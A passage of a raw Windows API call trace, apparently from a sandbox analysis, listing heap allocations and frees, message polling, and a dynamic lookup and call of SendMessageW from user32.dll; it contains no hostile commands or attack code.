RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe767d0 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4230 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe767a0 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec458 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe767b8 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4240 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76878 [0254.691] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4250 [0254.692] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4250 | out: hHeap=0xc60000) returned 1 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec480 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76890 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4250 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768a8 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4260 [0254.692] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4260 | out: hHeap=0xc60000) returned 1 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4a8 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768c0 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4260 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768d8 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4270 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768f0 [0254.692] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4270 | out: hHeap=0xc60000) returned 1 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4d0 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76908 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4270 [0254.692] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76908 | out: hHeap=0xc60000) returned 1 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec4f8 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76908 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76920 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4280 [0254.692] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768f0 | out: hHeap=0xc60000) returned 1 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768f0 [0254.692] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4280 | out: hHeap=0xc60000) returned 1 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec520 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76938 [0254.692] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4280 [0254.693] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76938 | out: hHeap=0xc60000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec548 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76938 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76950 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed4290 [0254.693] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe768f0 | out: hHeap=0xc60000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe768f0 [0254.693] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4290 | out: hHeap=0xc60000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec570 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76968 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4290 [0254.693] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76968 | out: hHeap=0xc60000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec598 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76968 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76980 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe819b8 [0254.693] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec5c0 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76998 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42a0 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe769b0 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe769c8 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42b0 [0254.693] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe769c8 | out: hHeap=0xc60000) returned 1 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec5e8 [0254.693] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe769c8 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe769e0 [0254.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe769f8 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76a10 [0254.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76a28 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76a40 [0254.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76a58 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76a70 [0254.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76a88 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76aa0 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ab8 [0254.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ad0 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.694] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ae8 [0254.694] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b00 [0254.695] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe81a00 [0254.695] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec5e8 | out: hHeap=0xc60000) returned 1 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b18 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.695] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b30 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b48 [0254.695] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b60 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.695] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42c0 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b78 [0254.695] CharLowerBuffW (in: lpsz="lresult", cchLength=0x7 | out: lpsz="lresult") returned 0x7 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b90 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42d0 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42e0 [0254.695] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ba8 [0254.695] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42d0 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ba8 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42e0 | out: hHeap=0xc60000) returned 1 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec5e8 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42e0 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ba8 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42d0 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42f0 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b90 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ba8 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42d0 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42f0 | out: hHeap=0xc60000) returned 1 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42f0 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b90 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42d0 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4300 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ba8 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42d0 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ba8 | out: hHeap=0xc60000) returned 1 [0254.696] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4300 | out: hHeap=0xc60000) returned 1 [0254.696] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4300 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ba8 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42d0 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4310 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b90 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ba8 | out: hHeap=0xc60000) returned 1 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42d0 | out: hHeap=0xc60000) returned 1 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4310 | out: hHeap=0xc60000) returned 1 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4310 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b90 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42d0 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4320 [0254.697] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ba8 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42d0 | out: hHeap=0xc60000) returned 1 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ba8 | out: hHeap=0xc60000) returned 1 [0254.697] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4320 | out: hHeap=0xc60000) returned 1 [0254.697] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76e00000 [0254.698] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ba8 [0254.698] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4320 [0254.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0254.698] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xd) returned 0xe76b90 [0254.698] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SendMessageW", cchWideChar=13, lpMultiByteStr=0xe76b90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMessageW", lpUsedDefaultChar=0x0) returned 13 [0254.698] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.699] GetProcAddress (hModule=0x76e00000, lpProcName="SendMessageW") returned 0x76e19679 [0254.699] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ba8 | out: hHeap=0xc60000) returned 1 [0254.699] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4320 | out: hHeap=0xc60000) returned 1 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xeec610 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4320 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42d0 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4330 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4340 [0254.699] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4320 | out: hHeap=0xc60000) returned 1 [0254.699] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42d0 | out: hHeap=0xc60000) returned 1 [0254.699] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4330 | out: hHeap=0xc60000) returned 1 [0254.699] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4340 | out: hHeap=0xc60000) returned 1 [0254.699] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec610 | out: hHeap=0xc60000) returned 1 [0254.699] SendMessageW (hWnd=0x30166, Msg=0xc5, wParam=0x3b9ac9ff, lParam=0x0) returned 0x1 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4340 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xcb2140 [0254.699] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xd82430 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76ba8 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b90 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bc0 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4330 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bc0 | out: hHeap=0xc60000) returned 1 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4330 | out: hHeap=0xc60000) returned 1 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b90 | out: hHeap=0xc60000) returned 1 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76b90 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bc0 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bd8 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4330 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bd8 | out: hHeap=0xc60000) returned 1 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4330 | out: hHeap=0xc60000) returned 1 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bc0 | out: hHeap=0xc60000) returned 1 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bc0 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bd8 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bf0 [0254.700] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4330 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bf0 | out: hHeap=0xc60000) returned 1 [0254.700] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4330 | out: hHeap=0xc60000) returned 1 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bd8 | out: hHeap=0xc60000) returned 1 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bd8 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bf0 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76c08 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4330 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76c08 | out: hHeap=0xc60000) returned 1 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4330 | out: hHeap=0xc60000) returned 1 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76bf0 | out: hHeap=0xc60000) returned 1 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76bf0 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76c08 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe76c20 [0254.701] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed4330 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76c20 | out: hHeap=0xc60000) returned 1 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4330 | out: hHeap=0xc60000) returned 1 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76c08 | out: hHeap=0xc60000) returned 1 [0254.701] FreeLibrary (hLibModule=0x76e00000) returned 1 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42e0 | out: hHeap=0xc60000) returned 1 [0254.701] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42f0 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4300 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed4310 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeec5e8 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b78 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe769e0 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe769c8 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76a10 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe769f8 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76a40 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76a28 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76a70 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76a58 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76a88 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ab8 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76aa0 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ad0 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b00 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76ae8 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b18 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b48 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b30 | out: hHeap=0xc60000) returned 1 [0254.702] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe76b60 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81a00 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42b0 | out: hHeap=0xc60000) returned 1 [0254.703] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42b0 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xee0400 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xed42c0 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0400 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42c0 | out: hHeap=0xc60000) returned 1 [0254.703] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xed42b0 | out: hHeap=0xc60000) returned 1 [0254.703] PeekMessageW (in: lpMsg=0x87f5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5e4) returned 0 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42b0 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xed42c0 [0254.703] RtlAllocateHeap (HeapHandle=0xc60000, 